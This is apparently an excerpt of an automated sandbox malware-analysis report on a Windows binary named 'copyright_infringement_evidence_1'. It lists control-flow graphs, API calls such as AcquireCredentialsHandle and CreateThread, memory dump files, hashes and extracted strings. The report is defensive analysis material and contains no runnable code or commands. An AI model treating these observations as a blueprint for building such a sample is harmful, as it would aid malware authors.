                                                                                                          control_flow_graph 1582 7ff7a17a3788-7ff7a17a37ac call 7ff7a181aba0 call 7ff7a178c640 1587 7ff7a17a37b2-7ff7a17a37d0 1582->1587 1588 7ff7a17a3995-7ff7a17a3a1f call 7ff7a18d8d40 call 7ff7a181a040 call 7ff7a181a740 1582->1588 1590 7ff7a17a37d2-7ff7a17a37dd 1587->1590 1591 7ff7a17a37fd 1587->1591 1606 7ff7a17a3a21-7ff7a17a3a32 call 7ff7a181a1d0 call 7ff7a181a7f0 1588->1606 1607 7ff7a17a3a37-7ff7a17a3a6f call 7ff7a181a830 1588->1607 1593 7ff7a17a37df-7ff7a17a37f2 call 7ff7a17dc2c0 1590->1593 1594 7ff7a17a3804-7ff7a17a3857 call 7ff7a1803de0 1590->1594 1591->1594 1593->1594 1604 7ff7a17a385c-7ff7a17a3865 1594->1604 1605 7ff7a17a3857 call 7ff7a1803de0 1594->1605 1608 7ff7a17a38c0-7ff7a17a38d7 memmove 1604->1608 1609 7ff7a17a3867-7ff7a17a387b 1604->1609 1605->1604 1606->1607 1621 7ff7a17a3a71-7ff7a17a3a74 1607->1621 1622 7ff7a17a3a8a-7ff7a17a3a92 1607->1622 1611 7ff7a17a38de-7ff7a17a38f0 call 7ff7a17a6ce0 1608->1611 1613 7ff7a17a3898-7ff7a17a38be memmove 1609->1613 1614 7ff7a17a387d-7ff7a17a3893 memmove 1609->1614 1623 7ff7a17a38f2-7ff7a17a38f5 1611->1623 1624 7ff7a17a390b-7ff7a17a3913 1611->1624 1613->1611 1614->1613 1621->1622 1625 7ff7a17a3a76-7ff7a17a3a85 call 7ff7a178c650 1621->1625 1627 7ff7a17a3a94-7ff7a17a3a97 1622->1627 1628 7ff7a17a3aa9-7ff7a17a3ab1 1622->1628 1623->1624 1626 7ff7a17a38f7-7ff7a17a3906 call 7ff7a178c650 1623->1626 1629 7ff7a17a3915-7ff7a17a3918 1624->1629 1630 7ff7a17a392a-7ff7a17a3932 1624->1630 1625->1622 1626->1624 1627->1628 1633 7ff7a17a3a99-7ff7a17a3aa4 call 7ff7a178c650 1627->1633 1635 7ff7a17a3ad1-7ff7a17a3ad9 1628->1635 1636 7ff7a17a3ab3-7ff7a17a3ab8 1628->1636 1629->1630 1634 7ff7a17a391a-7ff7a17a3925 call 7ff7a178c650 1629->1634 1637 7ff7a17a3951-7ff7a17a3959 1630->1637 1638 7ff7a17a3934-7ff7a17a3939 1630->1638 1633->1628 1634->1630 1639 7ff7a17a3aef-7ff7a17a3af2 1635->1639 1640 7ff7a17a3adb-7ff7a17a3aea call 7ff7a178c650 1635->1640 1645 7ff7a17a3ac0-7ff7a17a3acf call 7ff7a181a1c0 1636->1645 1641 7ff7a17a396f-7ff7a17a3985 1637->1641 1642 7ff7a17a395b-7ff7a17a3964 1637->1642 1646 7ff7a17a3940-7ff7a17a394f call 7ff7a181a1c0 1638->1646 1649 7ff7a17a3bd2-7ff7a17a3bdd 1639->1649 1650 7ff7a17a3af8-7ff7a17a3b04 call 7ff7a17a6dc0 1639->1650 1640->1639 1642->1641 1648 7ff7a17a396a call 7ff7a178c650 1642->1648 1645->1635 1646->1637 1648->1641 1655 7ff7a17a3bdf-7ff7a17a3be6 call 7ff7a17dbfe0 1649->1655 1656 7ff7a17a3beb-7ff7a17a3bfb DeleteSecurityContext 1649->1656 1662 7ff7a17a3eff-7ff7a17a3f15 1650->1662 1655->1656 1660 7ff7a17a3c06-7ff7a17a3c10 1656->1660 1661 7ff7a17a3bfd-7ff7a17a3c01 call 7ff7a181ab90 1656->1661 1664 7ff7a17a3c12-7ff7a17a3c15 1660->1664 1665 7ff7a17a3c2c-7ff7a17a3c36 1660->1665 1661->1660 1664->1665 1668 7ff7a17a3c17-7ff7a17a3c27 call 7ff7a178c650 1664->1668 1666 7ff7a17a3c38-7ff7a17a3c3c 1665->1666 1667 7ff7a17a3c4a-7ff7a17a3c5a call 7ff7a17a6dc0 1665->1667 1666->1667 1670 7ff7a17a3c3e-7ff7a17a3c45 call 7ff7a17dc2c0 1666->1670 1674 7ff7a17a3c5c-7ff7a17a3c66 call 7ff7a178c650 1667->1674 1675 7ff7a17a3c6b-7ff7a17a3c72 1667->1675 1668->1665 1670->1667 1674->1675 1677 7ff7a17a3c74-7ff7a17a3c7e call 7ff7a178c650 1675->1677 1678 7ff7a17a3c83-7ff7a17a3c8d 1675->1678 1677->1678 1680 7ff7a17a3c8f-7ff7a17a3c9c call 7ff7a178c650 1678->1680 1681 7ff7a17a3ca1-7ff7a17a3cab 1678->1681 1680->1681 1681->1662 1682 7ff7a17a3cb1-7ff7a17a3cbb 1681->1682 1684 7ff7a17a3cc1-7ff7a17a3ccc 1682->1684 1685 7ff7a17a3d74-7ff7a17a3d77 1682->1685 1686 7ff7a17a3cdd-7ff7a17a3ce4 1684->1686 1685->1662 1687 7ff7a17a3d7d-7ff7a17a3efa call 7ff7a178c650 1685->1687 1688 7ff7a17a3cd0-7ff7a17a3cd7 1686->1688 1689 7ff7a17a3ce6-7ff7a17a3cf4 call 7ff7a178c650 1686->1689 1687->1662 1688->1686 1691 7ff7a17a3d6d 1688->1691 1689->1688 1691->1685
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 2162964266-0
                                                                                                          • Opcode ID: d982cda98af9a71d4406acfa079eb0a96e24d57c73ff024392b625d85be536cc
                                                                                                          • Instruction ID: 6a5af8bd04a03161434b4ba10e6c161b0635fd137d1bd425018eec31dababebc
                                                                                                          • Opcode Fuzzy Hash: d982cda98af9a71d4406acfa079eb0a96e24d57c73ff024392b625d85be536cc
                                                                                                          • Instruction Fuzzy Hash: A5C1A272B0A68181FB64AF15E1403B9E361FF897C0F85A031DA5D076A6DFBDE194CB60

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1695 7ff7a1782023-7ff7a178206e memmove call 7ff7a178c4c0 1698 7ff7a178229e-7ff7a178231f 1695->1698 1699 7ff7a1782074-7ff7a178208d call 7ff7a178c640 1695->1699 1700 7ff7a17820dc 1698->1700 1701 7ff7a1782325 1698->1701 1709 7ff7a1782093-7ff7a17820a2 1699->1709 1710 7ff7a1783430-7ff7a1783496 call 7ff7a18d8d40 call 7ff7a18d9120 call 7ff7a18d8f10 call 7ff7a18d93c0 1699->1710 1703 7ff7a17820e6-7ff7a17820f3 1700->1703 1706 7ff7a17820e1 call 7ff7a1787d20 1700->1706 1701->1703 1704 7ff7a1783232-7ff7a178323d 1701->1704 1711 7ff7a17820f9-7ff7a178225f call 7ff7a178c690 call 7ff7a17885c0 call 7ff7a189efa0 call 7ff7a18a5890 call 7ff7a18b5440 call 7ff7a189fea0 1703->1711 1712 7ff7a1781fa4-7ff7a1781fa7 1703->1712 1707 7ff7a1783252-7ff7a1783255 1704->1707 1708 7ff7a178323f-7ff7a178324d call 7ff7a178c650 1704->1708 1706->1703 1714 7ff7a1783257-7ff7a178325b 1707->1714 1715 7ff7a1783282-7ff7a178328d 1707->1715 1708->1707 1716 7ff7a17820a8 1709->1716 1717 7ff7a1781f93 1709->1717 1763 7ff7a178349b-7ff7a17834a2 call 7ff7a18d8f10 1710->1763 1711->1763 1778 7ff7a1782265-7ff7a178242b call 7ff7a17817d0 call 7ff7a18b5440 call 7ff7a18ad410 call 7ff7a189fea0 1711->1778 1718 7ff7a1781faa-7ff7a1781fad 1712->1718 1723 7ff7a1783269-7ff7a1783270 1714->1723 1721 7ff7a17832a5-7ff7a17832b8 1715->1721 1722 7ff7a178328f-7ff7a17832a0 call 7ff7a178c650 1715->1722 1724 7ff7a1781f9d 1716->1724 1717->1724 1727 7ff7a1781f98 call 7ff7a1787d20 1717->1727 1725 7ff7a1781fc0-7ff7a1781fe1 1718->1725 1726 7ff7a1781faf-7ff7a1781fb8 1718->1726 1732 7ff7a17832ba-7ff7a17832be 1721->1732 1733 7ff7a17832e4-7ff7a17832ef 1721->1733 1722->1721 1734 7ff7a1783272-7ff7a1783280 call 7ff7a178c650 1723->1734 1735 7ff7a1783260-7ff7a1783267 1723->1735 1724->1712 1726->1725 1736 7ff7a1781fbb call 7ff7a178c650 1726->1736 1727->1724 1739 7ff7a17832c9-7ff7a17832d1 1732->1739 1741 7ff7a1783307-7ff7a1783312 1733->1741 1742 7ff7a17832f1-7ff7a1783302 call 7ff7a178c650 1733->1742 1734->1735 1735->1715 1735->1723 1736->1725 1748 7ff7a17832d3-7ff7a17832e2 call 7ff7a178c650 1739->1748 1749 7ff7a17832c0-7ff7a17832c7 1739->1749 1744 7ff7a1783327-7ff7a1783332 1741->1744 1745 7ff7a1783314-7ff7a1783322 call 7ff7a178c650 1741->1745 1742->1741 1754 7ff7a1783347-7ff7a1783352 1744->1754 1755 7ff7a1783334-7ff7a1783342 call 7ff7a178c650 1744->1755 1745->1744 1748->1749 1749->1733 1749->1739 1754->1718 1761 7ff7a1783358-7ff7a178336b call 7ff7a178c650 1754->1761 1755->1754 1761->1718 1769 7ff7a17834a7-7ff7a17834de call 7ff7a18d93c0 1763->1769 1773 7ff7a17834e3-7ff7a17834f5 call 7ff7a18d9120 1769->1773 1777 7ff7a17834fa-7ff7a1783509 1773->1777 1779 7ff7a178352b-7ff7a178354b call 7ff7a18d93c0 1777->1779 1783 7ff7a1783550 1778->1783 1799 7ff7a1782431-7ff7a1782916 call 7ff7a1789a50 call 7ff7a18a5a00 CloseHandle * 2 call 7ff7a1781110 call 7ff7a1781d20 call 7ff7a1788c90 1778->1799 1779->1783 1785 7ff7a178355c-7ff7a1783569 call 7ff7a18d8d20 1783->1785 1786 7ff7a1783557 call 7ff7a18d8f10 1783->1786 1791 7ff7a178356e-7ff7a1783579 call 7ff7a18d8d20 1785->1791 1786->1785 1795 7ff7a178357e-7ff7a178359b call 7ff7a18d8d40 1791->1795 1802 7ff7a178359d-7ff7a17835a8 1795->1802 1803 7ff7a1783606-7ff7a1783610 1795->1803 1820 7ff7a178291c-7ff7a178297c 1799->1820 1821 7ff7a1782f30-7ff7a1782f73 1799->1821 1806 7ff7a17835ab 1802->1806 1806->1806 1820->1773 1827 7ff7a1782982-7ff7a17829bc call 7ff7a18a11b0 call 7ff7a18a11e0 1820->1827 1823 7ff7a1782f75-7ff7a1782f81 1821->1823 1824 7ff7a1782fd1-7ff7a1782fe9 call 7ff7a1788d10 1821->1824 1826 7ff7a1782f89-7ff7a1782f90 1823->1826 1832 7ff7a1782ffe-7ff7a178300e call 7ff7a17814b0 1824->1832 1833 7ff7a1782feb-7ff7a1782ff9 call 7ff7a178c650 1824->1833 1829 7ff7a1782fc9 1826->1829 1830 7ff7a1782f92-7ff7a1782fb3 call 7ff7a178bbd0 1826->1830 1827->1777 1843 7ff7a17829c2-7ff7a1782a29 call 7ff7a18ad410 call 7ff7a1789a50 call 7ff7a18ad6f0 call 7ff7a18a5a90 1827->1843 1829->1824 1830->1769 1841 7ff7a1782fb9-7ff7a1782fc4 1830->1841 1844 7ff7a1783021-7ff7a1783023 1832->1844 1845 7ff7a1783010-7ff7a178301c call 7ff7a178c650 1832->1845 1833->1832 1841->1826 1846 7ff7a1782fc6 1841->1846 1856 7ff7a1783028-7ff7a1783041 call 7ff7a178c640 1843->1856 1857 7ff7a1782a2f-7ff7a1782a73 call 7ff7a1781110 call 7ff7a18c81e0 1843->1857 1844->1725 1845->1844 1846->1829 1856->1710 1862 7ff7a1783047-7ff7a1783066 call 7ff7a1781110 1856->1862 1867 7ff7a178306b-7ff7a178308c call 7ff7a178c640 1857->1867 1868 7ff7a1782a79-7ff7a1782a8d call 7ff7a1788150 1857->1868 1869 7ff7a17831fd-7ff7a1783215 call 7ff7a1788910 1862->1869 1867->1795 1875 7ff7a1783092-7ff7a17830b3 1867->1875 1876 7ff7a1782ab9 1868->1876 1877 7ff7a1782a8f 1868->1877 1869->1704 1883 7ff7a1783217-7ff7a178322d call 7ff7a178c650 1869->1883 1879 7ff7a17830c5-7ff7a17830ca 1875->1879 1880 7ff7a17830b5-7ff7a17830c0 call 7ff7a178c650 1875->1880 1882 7ff7a1782abe-7ff7a1782b0c memmove call 7ff7a18a11b0 call 7ff7a18a11e0 1876->1882 1877->1791 1881 7ff7a1782a95-7ff7a1782ab2 call 7ff7a178c640 1877->1881 1879->1869 1880->1879 1881->1882 1890 7ff7a1782ab4 1881->1890 1894 7ff7a178350b-7ff7a178351a 1882->1894 1895 7ff7a1782b12-7ff7a1782bd8 call 7ff7a18beb60 1882->1895 1883->1704 1890->1785 1894->1779 1895->1821 1899 7ff7a1782bdb call 7ff7a18aa440 1895->1899 1899->1821
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memmove
                                                                                                          • String ID: called `Result::unwrap()` on an `Err` value$failed to spawn thread/rustc/eeb90cda1969383f56a2637cbd3037bdf598841c\library\std\src\thread\mod.rs
                                                                                                          • API String ID: 2162964266-2483334152
                                                                                                          • Opcode ID: 853fcd203e29ef3d29836ac21cb51ff69bf68b9a8901620e1f9184e51d460f6a
                                                                                                          • Instruction ID: 7eed34d46dd4e4203b46805f700b489a760c4424fdf9c1b1050f364083fd02ee
                                                                                                          • Opcode Fuzzy Hash: 853fcd203e29ef3d29836ac21cb51ff69bf68b9a8901620e1f9184e51d460f6a
                                                                                                          • Instruction Fuzzy Hash: 3CC1312290EAC180F771AB15E4413EAE360FB98795F855132DE8C07A7ADF7CE595CB10
                                                                                                          APIs
                                                                                                          • memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00007FF7A1796777), ref: 00007FF7A17FD517
                                                                                                          • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00007FF7A1796777), ref: 00007FF7A17FD66C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memmovememset
                                                                                                          • String ID: assertion failed: !self.context.is_null()
                                                                                                          • API String ID: 1288253900-2445162553
                                                                                                          • Opcode ID: ef53b029a3e89383ba1a10db0a9e01fe02f909499a6f7e069897c6645631bad8
                                                                                                          • Instruction ID: 9a76657c9e559de3909e0f82f19a418e971b54580801e6e0fb841758ea567122
                                                                                                          • Opcode Fuzzy Hash: ef53b029a3e89383ba1a10db0a9e01fe02f909499a6f7e069897c6645631bad8
                                                                                                          • Instruction Fuzzy Hash: 15618062A0A78186FB21EB15E5443AAE352FB487D4F855431DE4E077B6DEBCE045CB10
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileHandleInformation$ErrorLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 3070998852-0
                                                                                                          • Opcode ID: e640dc660f5f54a2b94c5f7fa840913ff5814a287c06719db1ef24afcb50fde8
                                                                                                          • Instruction ID: a6b7a44b9b8c38f6d1f8a6f85135b192fc86a9e84aae1905c3af5a831d55bb2b
                                                                                                          • Opcode Fuzzy Hash: e640dc660f5f54a2b94c5f7fa840913ff5814a287c06719db1ef24afcb50fde8
                                                                                                          • Instruction Fuzzy Hash: 5E316F72A10A518FF320CFAAE4407ADB7B0FB48798F548125CF8A13B54DB78E591CB50
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 2162964266-0
                                                                                                          • Opcode ID: 2a82fa1cc3ec58796a192463394443fbee7459062c772465217f2cdfd5f2f8a1
                                                                                                          • Instruction ID: 21fb80189ac66a3eef37e3d2467514bb5115897ac7864cb0967ecfa811d74490
                                                                                                          • Opcode Fuzzy Hash: 2a82fa1cc3ec58796a192463394443fbee7459062c772465217f2cdfd5f2f8a1
                                                                                                          • Instruction Fuzzy Hash: 0D71D362B0A78181FB10AF12A5442A8E391FB48BE4F964071EECD07BA5DFBDF151CB10
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 2162964266-0
                                                                                                          • Opcode ID: 77072426e5aff312b7068cd78b065bb437a8053957dfebffea10731d589381a2
                                                                                                          • Instruction ID: ae3832a0c2be2f572b5d85b8396891e7713b1d017f53553bee127c89a4f3a996
                                                                                                          • Opcode Fuzzy Hash: 77072426e5aff312b7068cd78b065bb437a8053957dfebffea10731d589381a2
                                                                                                          • Instruction Fuzzy Hash: E141422260EA8281FB71AF15E0413E9E761FB857D4F855031DA8D07AAADF7CE185CF60
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AcquireCredentialsHandle
                                                                                                          • String ID: Microsoft Unified Security Protocol Provider
                                                                                                          • API String ID: 3250056690-238809041
                                                                                                          • Opcode ID: 5120572bf9b3ac56afb3a44914465e55619678682884051a7036217e5ccbbb25
                                                                                                          • Instruction ID: a79944f526c40e4dee258dc68be5fa2b023fdca1a8ad1d898dd5ab89c6dcf408
                                                                                                          • Opcode Fuzzy Hash: 5120572bf9b3ac56afb3a44914465e55619678682884051a7036217e5ccbbb25
                                                                                                          • Instruction Fuzzy Hash: C2813663A1ABC042FB209B15E000779A7A0FB55BA4F575634DE9D073A4EFBCE4A1CB10
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: QueryValue
                                                                                                          • String ID: ErrSendError
                                                                                                          • API String ID: 3660427363-1189180904
                                                                                                          • Opcode ID: a88f2544b19b8bf42e4bdfb242f02813253e3326767d05040164cc57272ed958
                                                                                                          • Instruction ID: 16c070a00ede14057be4f2519379f86f65735fa06c15c492d5cf2c6e6e96edf2
                                                                                                          • Opcode Fuzzy Hash: a88f2544b19b8bf42e4bdfb242f02813253e3326767d05040164cc57272ed958
                                                                                                          • Instruction Fuzzy Hash: 9751BD32A1A68581FB519B01E44076AF761FB89790FA0A035FE8D07BA9CFBDD485CF50
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset
                                                                                                          • String ID: filled overflowIdleBusyDisabledInit
                                                                                                          • API String ID: 2221118986-887005363
                                                                                                          • Opcode ID: 3e1e0e80a437e3e8f29631c1cc8ac4294c5bbd77886f0560a59ba85ebc5d7e0e
                                                                                                          • Instruction ID: a12be5a0225de5eddf6c33f7bbe72f7ed12890c9c86e81a9be38d57ada533ad2
                                                                                                          • Opcode Fuzzy Hash: 3e1e0e80a437e3e8f29631c1cc8ac4294c5bbd77886f0560a59ba85ebc5d7e0e
                                                                                                          • Instruction Fuzzy Hash: 08413A62B1B74141FB94EB21D5847B9E312EB88BD0F968131FD1C437A6DEBCD0458750
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateErrorLastThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 1689873465-0
                                                                                                          • Opcode ID: 040f403f1c1cc08f43dff2a0c7fcadbea2a30026e5f30d4d297a2171d5802d42
                                                                                                          • Instruction ID: 6c0b31c3d523b39a2e200a7ea37a3594befd39db65c58621ea4598534569f765
                                                                                                          • Opcode Fuzzy Hash: 040f403f1c1cc08f43dff2a0c7fcadbea2a30026e5f30d4d297a2171d5802d42
